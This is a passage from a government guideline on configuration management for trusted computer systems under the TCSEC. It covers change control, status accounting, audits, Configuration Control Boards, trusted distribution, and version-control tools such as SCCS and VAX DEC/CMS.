For TCB configuration items, those items shall not be able to
change without the permission of the controlling party.   At
TCSEC class A1, this requirement is strengthened to require
"procedural safeguards"[1] to protect against unauthorized
modification of the materials used in the TCB (Requirement 19). 
These procedures should require that not only does the 

                                10

controlling party need to give permission to have a change
performed, but that the controlling party performs the change on
the master copy of the TCB that will be released.  This ensures
against changes being made to the master copy that are different
than the approved changes. 

The degree of configuration control that is exercised over the
TCB will affect whether or not it meets the TCSEC requirements
for configuration management.  The configuration management
requirements in the TCSEC require that a configuration management
system be in place during the "development and maintenance of the
TCB" at Class B2 (Requirement 1), and at Class A1, "during the
entire life-cycle"[1] of the TCB (Requirement 12).  A minimal
configuration control system that would not be sufficient in
meeting the TCSEC requirements, may only provide for review after
a change has been made to the system.  A system such as this may 
ensure that the change is complete and acceptable and may control
the release of the change, but for the most part, the control 
exercised is little more than an after-the-fact quality assurance
check. This system is certainly better than having no control 
system in place, but it would not meet the TCSEC requirements for
configuration management.  What is missing from this system that 
would bring it closer to the B2 requirements is control over the 
change as it is being made.  The configuration control required
by the TCSEC should provide for constant checking and approval of
a change from its inception, through implementation and testing,
to release.  The level of control exercised over the TCB may
exceed that of the rest of the system, but it is recommended that
all parts of the system be under configuration control.  

In the case of a change to hardware or software/firmware that
will be used at multiple sites, configuration control is also 
responsible for ensuring that each site receives the appropriate
version of the system. 

The point behind configuration control of the TCB is that all
changes to the TCB shall be approved, monitored, and evaluated to
provide assurance that the TCB functions properly and that all
security policies are maintained.

7.3  Configuration Status Accounting

Configuration status accounting is charged with reporting on the
progress of the development in very specific ways.  It
accomplishes this task through the processes of data recording,
data storing, and data reporting.  The main objective of
configuration status accounting is to record and report all
information that is of significance to the configuration 

                                11

management process.  What is of significance should be outlined
in the Configuration Management Plan.  The establishment of a new
baseline (see Section 9.1 THE BASELINE CONCEPT) or the meeting of
a milestone is an example of what should be recorded as
configuration status accounting information.  The requirements in
the configuration management plan should be viewed as the minimum
and any events that seem relevant to configuration management
should be captured and recorded in that they may prove to be
useful in the future.  

The configuration accounting system may consist of tracing
through documentation manually to find the status of a change or
it may consist of a database that can automatically track a
change.  As long as the information exists accurately in some
form though, it will serve its purpose.  The benefit of an online
status accounting system is that the information may be kept in a
more structured fashion, which would facilitate keeping it up to 
date.  Being able to query a database for information concerning
the status of a configuration change or configuration item would 
also be less cumbersome than sorting through notebook pages.
Finally, the durability of a diskette or hard disk for storage 
outweighs that of a spiral notebook or folder, provided that it
is properly backed up to avoid data loss in the event of a system
failure.  

Whichever system is used, it should be possible to quickly locate
all authorized versions of a configuration item, add together all
authorized changes with comments about the reason for the change,
and arrive at either the current status of that configuration
item, or some intermediate status of the requested item.  The
status of all authorized changes being performed should be
formulated into a System Status Report that will be presented at
a Configuration Control Board meeting (see Section 9.3 THE
CONFIGURATION CONTROL BOARD).  

Configuration status accounting "establishes records and reports
which enable proper logistics support, i.e., the supplying of
spares, instruction manuals, training and maintenance facilities,
etc. to be established."[5]  The records and reports produced 
through configuration status accounting should include a current 
configuration list, an historical change list, the original
designs, the status of change requests and their implementation,
and should provide the ability to trace all changes.

7.4  Configuration Audit

Configuration auditing involves checking for top to bottom
completeness of the configuration accounting information "to 

                                12

ascertain that only the [authorized] changes have been made in
the code that will actually be used as the new version of the
TCB."[1] (Requirement 11)  When a change has been made to a
system, it should be reviewed and audited for its effect on the
rest of the system. This should include reviewing and testing all
software to ensure that the change has been performed correctly. 

Configuration auditing is concerned with examining the control
process of the system and ensuring that it actually occurs the
way it should.  Configuration auditing for trusted systems
verifies that after a change has been made to the TCB, the
security features and assurances are maintained. Configuration
audits should be performed periodically to verify the
configuration status accounting information.  The configuration
audit minimizes the likelihood that unapproved changes have been
inserted without going unnoticed and that the status accounting
information adequately demonstrates that the configuration
management assurance is valid.

"A complete audit should include tracing each requirement down 
through all functions that implement it to see if that 
requirement is met."[2]  Furthermore, the configuration audit
should also ensure that no additions were made that were not
required.  For the audit to provide a useful form of technical
review, it should be predictable and as foolproof as possible,
i.e., there should be specific desired results. 

The configuration audit should verify that:

* the architectural design satisfies the requirements

* the detailed design satisfies the architectural design

* the code implements the detailed design

* the item/product performs per the requirements

* the configuration documentation and the item/product match

The main emphasis of configuration auditing is on providing the 
user with reasonable assurance that the version of a system in 
use is the same version that the user expects to be in use. 
Configuration audits ensure that the configuration control
procedures of the configuration management system are being
followed.  The assurance feature of configuration auditing is
provided through reasonable and consistent accountability
procedures.  All code audits should follow roughly the same
procedures and perform the same set of checks for every change to
the system.     

                                13

8.  THE CONFIGURATION MANAGEMENT PLAN

Effective configuration management should include a well-thought-
out plan that should be prepared immediately after project
initiation.  This plan should describe, in simple, positive
statements, what is to be done to implement configuration
management in the system and TCB.  A minimal configuration
management plan may be limited to simply defining how
configuration management will be implemented as it relates to the
identification, control, accounting, and auditing tasks.  The
configuration management plan described in the following
paragraphs is an example of a plan that goes into more detail and
contains documentation on all aspects of configuration
management, such as examples of documents to be used for
configuration management, procedures for any automated tools
available, or a Configuration Control Board roster (see Section
9.3 THE CONFIGURATION CONTROL BOARD).  The configuration
management plan should contain documentation that describes how
the configuration management "tasks are to be carried out in
sufficient detail that anyone involved with the project can
consult them to determine how each specific development task
relates to CM."[2]    

One portion of the configuration management plan should define
the roles played by designers, developers, management, the
Configuration Control Board, and all of the personnel involved
with any part of the life-cycle of the system.  The
responsibilities required by all those involved with the system
should be established and documented in the configuration
management plan to ensure that the human element functions
properly during configuration management.  A list of
Configuration Control Board members, or the titles of the members
should also be included in this section.

Any tools that will be available and used for configuration
management should be documented in the configuration management 
plan.  At TCSEC class A1, it is required that these tools shall
be "maintained under strict configuration control"[1]
(Requirement 18).  These tools may include forms used for change
control, conventions for labeling configuration items, software
libraries, as well as any automated tools that may be available
to support the configuration management process.  Samples of any
documents to be used for reporting should also be contained in
the configuration management plan with a description of each.

A section of the Configuration Management Plan should deal with
procedures.  Since the main thrust of configuration management
consists of the following of procedures, there needs to be
thorough documentation on what procedures one should follow 

                                14

during configuration management.  The configuration management 
plan should provide the procedures to take to ensure that both
user and design documentation are updated in synchrony with all
changes to the system.  It should include the guidelines for
creating and maintaining functional tests and documentation
throughout the life of the system.  The configuration management
plan should describe the procedures for how the design and
implementation of changes are proposed, evaluated, coordinated,
and approved or disapproved.  The configuration management plan
should also include the steps to take to ensure that only those
approved changes are actually included and that the changes are
included in all of the necessary areas.

Another portion of the configuration management plan should
define any existing "emergency" procedures, e.g., procedures for
performing a time sensitive change without going through a full
review process, that may override the standard procedure.  These
procedures should define the steps for retroactively implementing
configuration management after the emergency change has been
completed. 

The configuration management plan is a living document and should
remain flexible during design and development phases.  Although
the configuration management plan is in place to impose control
on a project, it should still be open to additions and changes as
designers and developers see fit.   This is not to say that the
configuration management plan is only a guide and need not be
followed, but that modifications should be able to occur.  If the
plan is not followed, there is no way it will be able to provide
the appropriate assurances.  In the event that a change is needed
to the configuration management plan, the change should be
carefully evaluated and approved.  In changes to the
configuration management plan of a trusted system this evaluation
shall ensure that the security features and assurances supported
by the plan are still maintained after the change has been
implemented.   

                                15

9.  IMPLEMENTATION METHODS

This section discusses implementation methods for configuration
management that may be used to meet some of the requirements of
the TCSEC.  Section 9.1 discusses the baseline concept as a
method of configuration identification.  The baseline concept
utilizes the features of configuration management spoken of
previously, but divides the life-cycle of the system into
different baselines.

Section 9.2 illustrates how a fictitious company, MER, Inc.,
conducts configuration management.  They are attempting to meet
the TCSEC requirements for a B2 system.   

Section 9.3 discusses the concept of a Configuration Control
Board (CCB) for carrying out configuration control.  A CCB is a
body of people responsible for configuration control.  This 
concept is widely used by many computer vendors.

9.1  The Baseline Concept

Baselines are established at pre-selected design points in the
system life-cycle.  One baseline may be used to describe a
specific version of a system, or in some configuration management
systems a single baseline may be defined at each of several major
milestones.   Baselines should be established at the discretion
of the Configuration Control Board and outlined in the
configuration management plan.  In cases where several baselines
are established, each baseline serves as a cutoff point for one
segment of development, while simultaneously acting as the step
off point for another segment.   The characteristics common to
all baselines are that the design of the system will be approved
at the point of their establishment and it is believed that any
changes to this design will have some impact on the future
development of the system. 

Baseline management is one technique for performing configuration
identification.  It identifies the system and TCB design and
development as a series of phases or baselines that are subject
to configuration control.  Used in conjunction with configuration
items, this is another effective way to identify the system and
its TCB configuration throughout its life-cycle.       

"For each different type of baseline, the individual components
to be controlled should be identified, and any changes that
update the current configuration should be approved and 
documented.  For each intermediate product in the development 
[life-cycle] there is only one baseline.  The current 

                                16

configuration can be found by applying all approved changes to
the baseline."[2]

In a system defining several baselines for different stages of
development, these baselines or milestones should be established
at the system inception to serve as guides throughout the
development process.   Although specific baselines are
established in this case, alternatives may be recommended to
promote greater design flexibility or efficiency. The number of
baselines that may be established for a system will vary
depending upon the size and complexity of the system and the
methods supported by the designers and developers.  It is 
possible to establish multiple baselines existing at the same
time so long as configuration management practices are applied
properly to each baseline.  The following example will discuss
the baseline concept using three common baseline categories:
functional, allocated, and product.  It should be emphasized that
these are simply basic milestones and baselines should be
established depending upon the decisions of the designers and 
developers.   

The first baseline, the functional baseline, is established at
the system inception.  It is derived from the performance and
objectives criteria documentation that consists of specifications
defining the system requirements.  Once these specifications have
been established, any changes to them should be approved.

The requirements produced in the functional baseline may be
divided and subdivided into various configuration items.  Once it
has been decided what the configuration items will be, each of
the items should be given a configuration identifier. From the
analysis of the system requirements the allocated baseline will
be established.  This baseline identifies all of the required
functions with a specific configuration item that is responsible
for the function.  In this baseline, an individual should be
charged with the responsibility for each configuration item.  
All changes affecting specifications defining design requirements
for the system or its configuration items as stated in the
allocated baseline should require approval of the responsible
individual.  

The final baseline, the product baseline, should contain that
version of the system that will be turned over for integration
testing.  This baseline signifies the end of the development
phase and should contain a releasable version of the system.  

The baseline example mention earlier in which one baseline is 
established for a single version of a system entails the same 
reasoning as the functional, allocated, and product baseline 

                                17

example.   The system established as a baseline in the single
baseline example will need to have an approved design before 
being placed under configuration control.  Prior to the design
approval, the system design will have to have undergone some type
of functional review and a process that would allocate these
functions to various configuration items.  Although the early
processes of the design will not be as formal in the single 
baseline example as they are when the early tasks are
individually defined, the system will still benefit from being
under the control of configuration management as a baseline.  The
main point of establishing any baseline is controlling changes to
that baseline by requiring any changes to it to have to undergo
an established change control process.  

9.2  Configuration Management at MER, Inc.

MER, Inc., is a manufacturer of computer systems.  Their latest
project consists of building a system that will meet the B2
requirements of the TCSEC.  In the past, their configuration
management has only consisted of quality assurance checks, but to
meet the B2 requirements they realize that they will need to have
specific configuration management procedures in place during the
development and maintenance of the system.    

The project manager was assigned the task of writing the
configuration management procedures and elected to present them
in a configuration management plan.  After doing some research on
what should be contained in the configuration management plan, he
proceeded to write a plan for MER, Inc.  The configuration
management plan that was written listed all of the steps to be
followed when carrying out configuration management for the
system.  It described the procedures to be followed by the
development team and described the automated tools that were
going to be used at MER, Inc. for configuration management. 
These tools consisted of an online tracking data base to be used
for status accounting, an online data base that contained a
listing of all of the items under configuration control, and
automated libraries used for storing software.  Before
development began, all of the development team was responsible
for reading the configuration management plan to ensure that they
were aware of the procedures to be followed for configuration
management.

As the system was developed, the TCB hardware, software, and
firmware were labeled using a configuration item numbering scheme
that had been explained in the configuration management plan.  In
addition, the documentation and tests accompanying these items 
were also given configuration item numbers to assure a consistent

                                18

mapping between TCB code and these items.  All of the
configuration item numbers and a description of the items were
stored in a data base that could be queried at any time to derive
the configuration of the entire system.  Software and
documentation were stored in a software library where they could
be retrieved and worked on without affecting the master versions. 
The master copies of all software were stored in a master library
that contained the releasable versions of the software.  Both of
these libraries are protected by a discretionary access control
mechanism to prevent any unauthorized personnel from tampering
with the software.    

During the development of the system, changes were required.  The
procedures for performing a change under configuration control
are described in the configuration management plan.  These are
the same procedures that will remain in effect throughout the
life-cycle of the system.  For each proposed change, a decision
has to be made by management whether or not the change is
feasible and necessary.  MER, Inc. has an online forum for
reviewing suggested changes.  This forum makes it possible for
all of the members of the development team to comment on how the
proposed change may affect their work.  Management would often
consult this forum to help arrive at their final decision.  

After a decision was made, a programmer was assigned to perform
the change.  The programmer would retrieve the most recent
version of the software from the software library and proceed to
change it.  As the change was being performed, the changes were
entered into the online tracking data base.  This made it
possible for members of the development team to query this data
base to find the current status of the change at any time.  After
the change had been performed it was tested and documented, and
upon successful completion it was forwarded to a reviewer. This
reviewer was the software manager, who was the only person
authorized to approve a changed version for release.   After the
change was approved for release, the changed version was stored
in the master library and a second copy was stored in the
software library.  Each change stored in these libraries was 
given a new configuration identification number.   A tool was
available at MER, Inc. that made it possible to identify changes
made to software.  It compared any two versions of the software
and provided a line-by-line listing of the differences between
the two.

It was realized at the beginning of the development process that
there would be times when critical changes would need to be
performed that would not be able to undergo this review process. 
For these changes, emergency procedures had been listed in the 
configuration management plan and a critical fix library was 

                                19

available to record critical changes that had occurred since a
release.

A control process for changes to the TCB hardware was also 
provided for in the configuration management plan.  The
procedures ensured that changes to the TCB hardware were
traceable and did not violate the security assumptions made by
the TCB software.  Similar to software changes, all hardware
changes were reviewed by the project manager before being 
implemented.  

After a change is made to the TCB software, MER, Inc. performs a
configuration audit to verify the information that exists in the
tracking data base.  Whether or not a change is performed, the
configuration management plan at MER, Inc. specifies that a
configuration audit be performed at least once a month.  This
audit compares the current master version with the status
accounting information to verify that no changes have been
inserted that were not approved.   

This configuration management plan encompasses the descriptive
top-level specification (DTLS), implementation documentation,
source code, object code, test fixtures, and test documentation,
and has been found to satisfy the TCSEC requirements for
configuration management at class B2.

9.3  The Configuration Control Board (CCB)

Configuration control may be performed in different ways.  One
method of configuration control that is in use by systems already
evaluated at TCSEC Class B2 and above is to have the control
carried out by a body of qualified individuals known as the
Configuration Control Board (CCB), also known as the
Configuration Change Board.  The Board is headed by a
chairperson, who is responsible for scheduling meetings and for
giving the final approval on any proposed changes.  The
membership of the CCB may vary in size and composition from
organization to organization, but it should include members from
any or all of the following areas of the system team:

   * Program Management

   * System Engineering

   * Quality Assurance

   * Technical Support

                                20

   * Integration and Test

   * System Installation

   * Technical Documentation

   * Hardware and Software/Firmware Acquisition

   * Program Development

   * Security Engineering           

   * User Groups

The members of the CCB should interact periodically, either
through formal meetings, electronic forums, or any other
available means, to discuss configuration management topics such
as proposed changes, configuration status accounting reports, and
other topics that may be of interest to the different areas of
the system development.  These interactions should be held at
periodic intervals to keep the entire system team up-to-date with
all advancements or alterations in the system.  The Board serves
to control changes to the system and ensures that only approved
changes are implemented into the system.  The CCB carries out
this function by considering all proposals for modifications and
new acquisitions and by making decisions regarding them.  

An important part of having cross representation in the CCB from
various groups involved in the system development is to prevent
"unnecessary and contradictory changes to the system while
allowing changes that are responsive to new requirements, changed
functional allocations, and failed tests."[2]  All of the members
of the Board should have a chance to voice their opinions on
proposed changes.  For example, if system engineering proposes a 
change that will affect security, both sides should be able to
present their case at a CCB meeting.  If diversity did not exist
in the CCB, changes may be performed, and upon implementation may
be found to be incompatible with the rest of the system.  

The configuration control process begins with the documentation 
of a change request.  This change request should include
justification for the proposed change, all of the affected items
and documents, and the proposed solution. The change request
should be recorded, either manually or online in order to provide
a way of tracking all proposed changes to the system and to
ensure against duplicate change requests being processed.  

When the change request is recorded, it should be distributed for
analysis by the CCB who will review and approve or disapprove the

                                21

change request.  An analysis of the total impact of the change
will decide whether or not the change should be performed.  The
CCB will approve or disapprove the change request depending upon
whether or not the change is viewed as a necessary and feasible 
change that will further the design goals of the system.  In
situations where trusted systems are involved, the CCB shall also
ensure that the change will not affect the security policy of the
system.

Once a decision has been reached regarding any modifications, the
CCB is responsible for prioritizing the approved modifications to
ensure that those that are most important are developed first.
When prioritizing changes, an effort should be made to have the
changes performed in the most logical order whenever possible.
The CCB is also responsible for assigning an authority to perform
the change and for ensuring that the configuration documentation
is updated properly.  The person assigned to do the change should
have the proper authorization to modify the system, and in
trusted systems processing sensitive information, this
authorization shall be required.  During the development of any
enhancements and new developments, the CCB continues to exert
control over the system by determining the level of testing
required for all developments. 

Upon completion of the change, the CCB is responsible for 
verifying that the change has been properly incorporated and that
only the approved change has been incorporated.   Tests should be
performed on the modified system or TCB to ensure that they
function properly after the change is completed.  The CCB should
review the test results of any developments and should be the
final voice on release decisions.  

The use of a CCB is one way of performing configuration control,
but not every vendor may have the desire or resources to
establish one.  Whatever the preference, there should still be
some way of performing the control processes described
previously.  

                                22

10.  OTHER TOPICS

10.1  Trusted Distribution

Related to the configuration management requirements for trusted
systems is the TCSEC requirement for trusted distribution at
class A1 which states:

      "A trusted ADP system control and distribution facility    
      shall be provided for maintaining the integrity of the     
      mapping between the master data describing the current     
      version of the TCB and the on-site master copy of the code 
      for the current version.  Procedures (e.g., site security  
      acceptance testing) shall exist for assuring that the TCB  
      software, firmware, and hardware updates distributed to a  
      customer are exactly as specified by the master            
      copies."[1]

Two questions that the trusted distribution process should answer
are: (a) Did the product received come from the organization who
was supposed to have sent it? and (b) Did the recipient receive
exactly what the sender intended?

Configuration management assists trusted distribution by ensuring
that no alterations are made to the TCB from the time of approved
modification to the time of release.  The additional
configuration management requirement at A1 that supports this is,
"A combination of technical, physical and procedural safeguards
shall be used to protect from unauthorized modification or
destruction the master copy or copies of all material used to
generate the TCB"[1] (Requirement 19).  This requirement calls
for strict control over changes made to any versions of the TCB. 
The possibility that a change may not be performed as specified,
or that a harmful modification may be inserted into the TCB
should be considered and the authority to perform changes to the
master copy should be restricted.  A single master copy authority
should be made responsible for ensuring that only approved and
acceptable changes are implemented into the master copy.

Configuration status accounting records and auditing reports can
provide accountability for all TCB versions in use.  In the event
of altered copies being distributed or "bogus" copies being
distributed that were not manufactured by the vendor, 
configuration management records will be able to assess the      
validity and accuracy of all TCB versions.  Trusted distribution 
displays the need for configuration control over all changes to
the TCB.  Without configuration control there would be no
accountability for the TCB versions distributed to the customer. 

                                23

10.2  Functional Testing

"The system developer shall provide to the evaluators a document
that describes the test plan, test procedures that show how the
security mechanisms were tested, and results of the security
mechanisms' functional testing."[1]  The creation and maintenance
of these functional tests is required to be part of the
configuration management procedures.  Test results and any
affected test documentation shall be maintained under
configuration management and updated wherever necessary
(Requirements 7, 8).  The tests should be repeatable, and include
sufficient documentation so that any knowledgeable programmer
will be able to figure out how to run them.  The test plan for
the system should be described in the functional specification
(or other design documentation) for the TCB, along with
descriptions of the test programs.  The test plan and programs
should be reviewed and audited along with the programs they test,
although the coding standards need not be as strict as those of
the tested programs.

It is not acceptable to only generate tests for code that was
opened or replaced, but all of the portions of the TCB that were
affected by the change should also be tested.  The NCSC
evaluators can provide a description of the security functional
tests required to meet the TCSEC testing requirements, including
the testing required as stated above for configuration
management.

10.3  Configuration Management Training

Each new technical employee should receive training in the
configuration management procedures that a particular
installation follows.  Experienced programmers, although they may
be familiar with some form of configuration management, will also
require training in any new procedures, i.e., an automated
accounting system, that will be required to be followed. 
Training should be conducted either "by holding formal classes or
by setting aside sufficient time for the reading of the company
wide configuration standards."[2]  New programmers should become
familiar with the Configuration Management Plan before being
allowed to incorporate any changes into the design baseline.  It
should be stressed that a failure to maintain the configuration
management standards resulting from untrained employees, could
prevent the system from receiving a rating.[2]  

                                24

10.4  Configuration Management Supervision

A successful configuration management system requires the 
following of many procedures.  Considering the demands made on   
the system staff, errors may occur and shortcuts may be sought 
which will jeopardize the entire configuration management plan. 
A review process should be present to ensure that no single
person can create a change to the system and implement it without
being subject to some type of approval process.  Supervisors, who
are responsible for the personnel performing the change should be
required to sign an official record that the change is the
correct change.[2]   

Proper supervision also provides assurance that whoever performs
the change has the proper authorization to do so.  Changes should
not be performed by personnel that are not qualified to perform
the change.  Also, in systems that process sensitive information,
the programmer performing the change shall possess the proper
security clearance to perform the change.

Management itself must directly support the configuration
management plan in order for it to work.  It should not encourage
cutting configuration management corners under any circumstances,
e.g., due to scheduling or budgeting.  Management should be
willing to support the expenditure of money, people, and time to
allow for proper configuration management. 

                                25

11.  RATINGS MAINTENANCE PROGRAM

The Ratings Maintenance Program (RAMP) has been developed by the
NCSC in an effort to keep the Evaluated Products List (EPL)
current.  By training vendor personnel to recognize which changes
may adversely affect the implemetation of the security policy of
the system, and to track these changes to the evaluated product
through the use of configuration management, RAMP will permit a
vendor to maintain the rating of the evaluated product without
having to re-evaluate the new version.  Because changes from one
version of an operating system to the next version may affect the
security features and assurances of that operating system,
configuration management is an integral part of RAMP.  For a
system to maintain its rating under this program, the NCSC shall
be assured, through the vendor's configuration management
procedures, that the changes made have not adversely affected the
implementation of the security mechanisms and assurances of the
system.

Each RAMP participant shall develop an NCSC approved Rating
Maintenance Plan (RMPlan) which includes a detailed Configuration
Management Plan (CMP) to support the rating maintenance process.
This requirement applies to all systems participating in RAMP,
regardless of class.  For further information about the RAMP
program and about configuration management requirements for RAMP,
contact:

           National Computer Security Center
           9800 Savage Road
           Fort George G. Meade, MD  20755©6000

           Attention: Chief, Requirements and Resources Division

                                26

12.  CONFIGURATION MANAGEMENT SUMMARY

The assurance provided by configuration management is beneficial
to all systems. It is a requirement for trusted systems for
classes B2 and above that a configuration management system "be
in place that maintains control of changes to the descriptive
top-level specification, other design data, implementation
documentation, source code, the running version of the object
code, and test fixtures and documentation"[1] (Requirements 1, 2,
3, 4, 5, 6, 7, 8).  Although configuration management is a
requirement for trusted systems for classes B2 and above, it
should be in place in all systems regardless of class rating, or
if the system has a rating at all.   

Successful configuration management is built around four main
objectives: control, identification, accounting, and auditing. 
Through the accomplishment of these objectives, configuration
management is able to maintain control over the TCB and protect
it against "unauthorized changes that could cause protection
mechanisms to malfunction or be bypassed completely."[1]  Even
for those aspects of the system which are not security-relevant,
configuration management is still a valuable method of ensuring
that all of the properties of a system are maintained after a
change.  It is very important to the success of configuration
management that a formal configuration management plan be adhered
to during the life-cycle of the system.

A successful configuration management plan should begin with
early and complete definition of configuration management goals,
scope, and procedures.  The success of configuration management
is dependent upon accuracy.  Changes should be identified and
accounted for accurately, and after the change is completed, the
change, and all affected parts of the system should be thoroughly
documented and tested.  

Configuration management provides control and traceability for
all changes made to the system.  Changes in progress are able to
be monitored through configuration status accounting information
in order to control the change and to evaluate its impact on
other parts of the system.  

An important part of having a successful configuration management
plan is that the people involved with it must adhere to its
procedures in order to keep all documentation current and the
status of changes up-to-date.  

With a firm and well documented configuration management plan in 
place, the occurrence of any unnecessary or duplicate changes 
will be reduced greatly and any necessary changes that are 

                                27

required should be able to be identified with great ease.  An
effective configuration management system should be able to show
what was supposed to have been built, what was built, and what is
presently being built. 

                                28

APPENDIX A:  AUTOMATED TOOLS

Automated tools may be used to perform some of the configuration
management functions that previously had to be performed
manually.  A data base management system, even with just a
limited query system, may be used to perform the configuration
audit and status accounting functions of configuration
management.  The principle behind using automated systems is that
text, both from source code and other documents involved in the
development of the system, can be entered into a Master Library
and modified only through the use of the automated system.  This
prevents anyone from performing a change without having the
proper authorization to access the configuration data base.  "In
general, only one program librarian, who should be the project
manager or someone directly responsible to the manager, should
have write access to the Master Library during development."[2]  

A number of software developers have created software control
facilities that are currently available to be used for
configuration status accounting.  A brief discussion of two of
these systems follows.

A.1   UNIX (1) SCCS

"Under the Unix (1) system, the make utility, and the elements
admin, get, prs, and delta, which comprise the Source Code
Control System, provide a basic configuration accounting system. 
Initially a directory is created using the mkdir function.  At
this point, it is possible to use the owner, group, world
protection scheme provided by Unix (1) to protect the directory. 
In addition a list of login identifiers is created which
specifies who may update each element to be processed by SCCS."
[2]

Following directory initiation, each document is entered using
the admin -n function.  Each entry that is made is referred to as
an element.  As each update is made to a new element, a new
generation of that element, known as a delta, is created.  The
name of each element that is stored in a file by SCCS is preceded
by "s.".  If a file is added to the directory that does not
contain this prefix, it is ignored by the SCCS function calls. 
When the admin function is called, a number of arguments may be
specified that "specify parameters that may affect the file, and
may be changed by a subsequent call to admin.  The alogin
argument is used to create the equivalent of an access control
list by listing the login names of users who can apply the delta
function to the element, thus creating either a new generation 

(1) UNIX is a registered trademark of AT&T Bell Laboratories
                                29  

(delta) or variant branch."[2]

The initial release, or initial delta, of each code module is
entered into the SCCS directory through the admin -n function,
thus creating the Master Library.  The programmer may update each 
module in the Master Library by using the get -e function "which
indicates that the module will be edited and then the completed
document will be reentered into the directory using the delta
function.  As long as the module being edited was extracted from
the SCCS directory using get -e, it can be returned to the
library using delta, and all necessary update information will be
entered with it.  The get function can be used to extract a copy
of any document, but after it is edited it cannot be reentered
into the library."[2]

"SCCS provides the capability to specify a software build by the
way it assigns an SCCS Identification Number (SID) to each output
of the delta function."[2]  One can get any version of a text or
source code by specifying the appropriate SID.  "There are
straightforward rules regarding how to specify the particular SID
desired when get is called.  If no SID is specified, the latest
release and level is provided."  The SID of the resulting call to
delta is affected by the SID used when get -e is called.[2]

"The function prs allows for configuration accounting, since it
extracts information from the s. files in the SCCS directory and
prints them out for the user.  Prs can be used to quickly create
reports, listing one or two important values such as the last
modified date for many SCCS files, or many values for one or two
file.  Larger reports can also be processed and created using an
editor."[2] 

A.2  VAX DEC/CMS 

"VAX DEC/CMS [7] is also used to track a history of each text
file stored in a CMS directory, but CMS does significantly more
auditing and cross-checking than admin does.  For example, if an
editor is used directly to modify a file in a CMS directory, any
further use by CMS of that file generates a warning meassage. 
Any files entered into a CMS directory by other than the CMS
utility will cause CMS itself to issue a warning message when it
is invoked for that directory.  Otherwise, the process of
configuration accounting is similar to SCCS.

The CMS CREATE LIBRARY function causes a directory to be set up,
and initial logging to start.  The project manager enters each
element into the directory by using the CMS CREATE ELEMENT
function.  One must RESERVE an element of a library to modify it,

                                30

and it can only be put back into the library using the REPLACE
function.  If someone else has RESERVEd an element between the
original programmer's RESERVE and REPLACE calls, a warning is
issued to both programmers and the occurrence is logged.  To get
a sample copy of the text, such as a program source, the FETCH
function will generate the latest generation or any specified
generation of an element, but will not allow an edited copy to be
reinserted into the library.  The SHOW function can be used to
audit the information about each element in the library.

Differences between SCCS and DEC/CMS appear concerning software
builds.  In Unix (1) a build must be either described in a
makefile, or else each element to be used in a build must be
retrieved from the SCCS directory using get, placed in another
directory, and the makefile then may refer to these source files
to create the executable build.  In CMS, the process of selecting
only a subset of source files, including some which are not the
most current, is automated by the use of class and group
mechanisms.  To explain how this works, one must understand the
CMS concepts of generations and variants.  Each generation of a
file corresponds to a Unix (1) delta.  Generations are normally
numbered in ascending order.  CMS also has the capability of
creating a variant development line to any generation by
specifying in the REPLACE function a variant name.  For example,
if one RESERVEs generation 3 of an element, then performs a
REPLACE/VARIANT = T, this will create generation 3T1 which may
then be developed separately from generation 3.  The first time
this is used, the equivalent of an SCCS branch delta is created. 
Branches themselves can have branches, a capability that SCCS
does not have.

A group can be defined within a CMS directory, using the CMS
CREATE GROUP, and CMS INSERT ELEMENT functions.  A group is
composed of all generations, including variant generations, of
all elements inserted into the group.  Groups can be included
within other groups.  Groups can be defined with a non-empty
intersection so that they have overlapping membership.

The CMS CREATE CLASS function, together with the CMS INSERT
GENERATION function, can be used to specify the exact elements of
a software build, and the DESCRIPTION file can then refer to the
entire class by using the /GENERATION=classname qualifier on
either the source or action line of a dependency rule.  The
makefile required by Unix (1) SCCS can be much more complex when
it is required to describe a software build for intermediate
testing."[2]   

(1) Unix is a registered trade mark of Bell Laboratories

                                31

GLOSSARY

Automatic Data Processing (ADP) System - An assembly of computer
hardware, firmware, and software configured for the purpose of
classifying, sorting, calculating, computing, summarizing,
transmitting and receiving, storing, and retrieving data with a
minimum of human intervention.[1]

Baseline - A set of critical observations or data used for a
comparison or a control.  A baseline indicates a cutoff point in
the design and development of a configuration item beyond which
configuration does not evolve without undergoing strict
configuration control policies and procedures.

Configuration Accounting - The recording and reporting of
configuration item descriptions and all departures from the
baseline during design and production.[2]  

Configuration Audit - An independent review of computer software
for the purpose of assessing compliance with established
requirements, standards, and baselines.[2]

Configuration Control - The process of controlling modifications
to the system's design, hardware, firmware, software, and
documentation which provides sufficient assurance the system is
protected against the introduction of improper modification prior
to, during, and after system implementation.

Configuration Control Board (CCB) - An established committee that
is the final authority on all proposed changes to the ADP system.

Configuration Identification - The identifying of the system
configuration throughout the design, development, test, and
production tasks.   

Configuration Item  - The smallest component of hardware,
software, firmware, documentation, or any of its discrete
portions, which is tracked by the configuration management
system.

Configuration Management - The management of changes made to a
system's hardware, software, firmware, documentation, tests, test
fixtures, and test documentation throughout the development and
operational life of the system.

Descriptive Top-Level Specification (DTLS) - A top-level 
specification that is written in a natural language (e.g.,
English), an informal program design notation, or a combination
of the two.[1]

                                32

Firmware - Equipments or devices within which computer 
programming instructions necessary to the performance of the 
device's discrete functions are electrically embedded in such a  
manner that they cannot be electrically altered during normal
device operations.[3]

Formal Security Policy Model - An accurate and precise
description, in a formal, mathematical language, of the security
policy supported by the system.

Formal Top-Level Specification - A top-level specification that
is written in a formal mathematical language to allow theorems
showing the correspondence of the system specifications to its
formal requirements to be hypothesized and formally proven.[1]

Granularity - The relative fineness or courseness by which a
mechanism can be adjusted.  The phrase "the granularity of a
single user" means the access control mechanism can be adjusted
to include or exclude any single user.[1] 

Hardware - The electric, electronic, and mechanical equipment
used for processing data.[3]

Informal Security Policy Model - An accurate and precise
description, in a natural language (e.g., English), of the
security policy supported by the system. 

Software - Various programming aids that are frequently supplied
by the manufacturers to facilitate the purchaser's efficient
operation of the equipment.  Such software items include various
assemblers, generators, subroutine libraries, compilers,
operating systems, and industry application programs.[6]

Tools - The means for achieving an end result.  The tools
referred to in this guideline are documentation, procedures, and
the organizational body, i.e., the CCB, which all contribute to
achieving the control objective of configuration management. 

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.[1]

                                33

REFERENCES

1.   National Computer Security Center, DOD Trusted Computer     
